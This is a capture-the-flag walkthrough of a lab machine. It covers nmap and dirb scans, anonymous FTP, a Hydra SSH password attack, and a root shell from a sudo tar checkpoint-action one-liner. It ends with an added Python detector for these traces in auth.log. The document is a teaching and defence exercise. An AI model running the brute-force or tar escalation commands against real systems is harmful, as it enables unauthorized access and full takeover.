To begin, I enumerated what was open on the machine with nmap.
sudo nmap -sV -sS -p- 10.10.224.157 --open
This gave the following results:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-09 14:09 EDT
2022-09-09 14:13:44 Authenticate/Decrypt packet error: packet HMAC authentication failed
2022-09-09 14:13:48 Authenticate/Decrypt packet error: packet HMAC authentication failed
Nmap scan report for 10.10.224.157
Host is up (0.10s latency).
Not shown: 56728 filtered tcp ports (no-response), 8804 closed tcp ports (reset)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 396.49 seconds
Seeing that HTTP (port 80) was open, I then ran a dirb scan to enumerate the web directories:
dirb http://10.10.224.157 -r
With these results:
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Fri Sep 9 14:17:32 2022
URL_BASE: http://10.10.224.157/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.224.157/ ----
==> DIRECTORY: http://10.10.224.157/images/
+ http://10.10.224.157/index.html (CODE:200|SIZE:969)
+ http://10.10.224.157/server-status (CODE:403|SIZE:278)
-----------------
END_TIME: Fri Sep 9 14:25:10 2022
DOWNLOADED: 4612 - FOUND: 2
I looked through the pages listed here, but couldn't find anything of value. I then took a look at the FTP server.
ftp 10.10.224.157 21
I was able to log in as anonymous and saw that it hosted two files, task.txt and locks.txt.
task.txt read as follows:
1.) Protect Vicious.
2.) Plan for Red Eye pickup on the moon.
-lin
This gave me a username, lin. locks.txt was simply a wordlist. Combining the two, I could run a Hydra attack against SSH:
hydra -l lin -P locks.txt ssh://10.10.224.157
This found the credentials for lin:
[22][ssh] host: 10.10.224.157 login: lin password: RedDr4gonSynd1cat3
Once I logged in as lin via SSH, I did my usual enumeration steps: gathering basic operating system information, reading the passwd file, checking file permissions and the tmp directories, and reviewing the crontab.
From this, I did notice the machine was vulnerable to PwnKit, but decided to see if I could find another method. I searched for SUID binaries, but didn't come up with anything useful. However, when checking what programs lin could run with sudo (sudo -l), I saw that the user could run tar as root.
I checked this against GTFOBins and found an escalation path.
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Running this gave me root access and full control of the machine.
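From the defender's side, both steps of this chain leave distinctive traces in auth.log: a burst of failed SSH passwords from one source (the Hydra run) followed by a success, and a sudo-to-root invocation of tar carrying --checkpoint-action=exec. The script below is an added example, not part of the original writeup; the log lines, hostname "bh" and source IPs are constructed for illustration.

```python
import re
from collections import defaultdict
# Constructed sample auth.log lines (Ubuntu syslog format); not captured from the box.
SAMPLE_LOG = """\
Sep  9 14:30:01 bh sshd[1201]: Failed password for lin from 10.10.14.5 port 40210 ssh2
Sep  9 14:30:02 bh sshd[1203]: Failed password for lin from 10.10.14.5 port 40212 ssh2
Sep  9 14:30:02 bh sshd[1205]: Failed password for lin from 10.10.14.5 port 40214 ssh2
Sep  9 14:30:03 bh sshd[1207]: Failed password for lin from 10.10.14.5 port 40216 ssh2
Sep  9 14:30:03 bh sshd[1209]: Failed password for lin from 10.10.14.5 port 40218 ssh2
Sep  9 14:30:04 bh sshd[1211]: Accepted password for lin from 10.10.14.5 port 40220 ssh2
Sep  9 14:31:10 bh sshd[1250]: Failed password for lin from 192.168.1.9 port 50001 ssh2
Sep  9 14:35:12 bh sudo:      lin : TTY=pts/0 ; PWD=/home/lin ; USER=root ; COMMAND=/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Sep  9 14:36:00 bh sudo:      lin : TTY=pts/0 ; PWD=/home/lin ; USER=root ; COMMAND=/bin/tar -czf /root/backup.tgz /var/www
"""
SSH_RE = re.compile(r"sshd\[\d+\]: (Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port")
SUDO_RE = re.compile(r"sudo:\s+(\S+) : .*?USER=(\S+) ; COMMAND=(.*)$")

def ssh_password_spray(lines, threshold=5):
    """Group SSH password attempts by (source IP, user); report sources with at
    least `threshold` failures and whether a later success followed them."""
    failures = defaultdict(int)
    success_after = set()
    for line in lines:
        m = SSH_RE.search(line)
        if not m:
            continue
        status, user, ip = m.groups()
        key = (ip, user)
        if status == "Failed":
            failures[key] += 1
        elif failures[key] >= threshold:  # success after a burst of failures
            success_after.add(key)
    return [(ip, user, n, (ip, user) in success_after)
            for (ip, user), n in failures.items() if n >= threshold]

def sudo_tar_checkpoint_exec(lines):
    """Flag sudo-to-root runs of tar whose --checkpoint-action executes a
    program (the GTFOBins pattern above); ordinary archive jobs are ignored."""
    hits = []
    for line in lines:
        m = SUDO_RE.search(line)
        if not m:
            continue
        user, target, cmd = m.groups()
        if target == "root" and cmd.split()[0].endswith("tar") \
                and "--checkpoint-action=exec=" in cmd:
            hits.append((user, cmd))
    return hits
```

Feed it real lines with `ssh_password_spray(open("/var/log/auth.log").read().splitlines())`; the same regexes work on journald output piped through `journalctl -o short`.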